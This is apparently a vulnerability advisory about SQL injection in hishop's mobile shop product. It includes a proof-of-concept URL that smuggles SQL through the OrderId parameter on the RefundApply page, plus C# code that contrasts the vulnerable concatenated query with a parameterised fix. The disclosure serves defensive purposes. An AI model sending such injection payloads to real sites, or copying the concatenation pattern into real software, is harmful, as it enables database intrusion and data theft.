### Brief description:
hishop latest version has a SQL injection (demo)
### Detailed description:
hishop latest version has a SQL injection (demo)
http://www.hishop.com.cn/products/ydfx/
[![1.JPG](https://images.seebug.org/upload/201512/251908128f3b569987249868b7d81fd8de4dd084.jpg)](https://images.seebug.org/upload/201512/251908128f3b569987249868b7d81fd8de4dd084.jpg)
Here is the demo:
Register any account, log in, and visit the POC:
```
http://ydfx.demo.shopefx.com/user/UserRefundApply.aspx?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271
```
### Proof of vulnerability:
```
http://ydfx.demo.shopefx.com/user/UserRefundApply.aspx?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271
```
[![2.JPG](https://images.seebug.org/upload/201512/25190902dff776ed8989665b72956360bdd5bef8.jpg)](https://images.seebug.org/upload/201512/25190902dff776ed8989665b72956360bdd5bef8.jpg)
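As an added illustration, not hishop's own code (the report shows none), the query pattern that lets the `OrderId` value above be interpreted as SQL, beside a parameterised version that closes the hole; the `RefundApply` table and method names are assumed.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

public static class RefundQueries
{
    // Assumed vulnerable pattern: the raw query-string value is concatenated into
    // the SQL text, so a single quote in OrderId closes the string literal and the
    // rest of the value (e.g. "and (select @@version)>0 ...") runs as SQL.
    public static string BuildVulnerableSql(string orderId)
    {
        return "SELECT * FROM RefundApply WHERE OrderId = '" + orderId + "'";
    }

    // Hardened version: OrderId travels as a typed parameter and is only ever
    // compared as data, whatever characters it contains. The length check rejects
    // clearly malformed ids before the database sees them.
    public static DataTable LoadRefund(SqlConnection conn, string orderId)
    {
        if (string.IsNullOrEmpty(orderId) || orderId.Length > 50)
            throw new ArgumentException("invalid OrderId");

        const string sql = "SELECT * FROM RefundApply WHERE OrderId = @OrderId";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@OrderId", SqlDbType.NVarChar, 50).Value = orderId;
            var table = new DataTable();
            using (var reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }
}
```

Beyond the parameter, a refund page should also check that the order belongs to the logged-in user, since the injection here is reachable with any self-registered account.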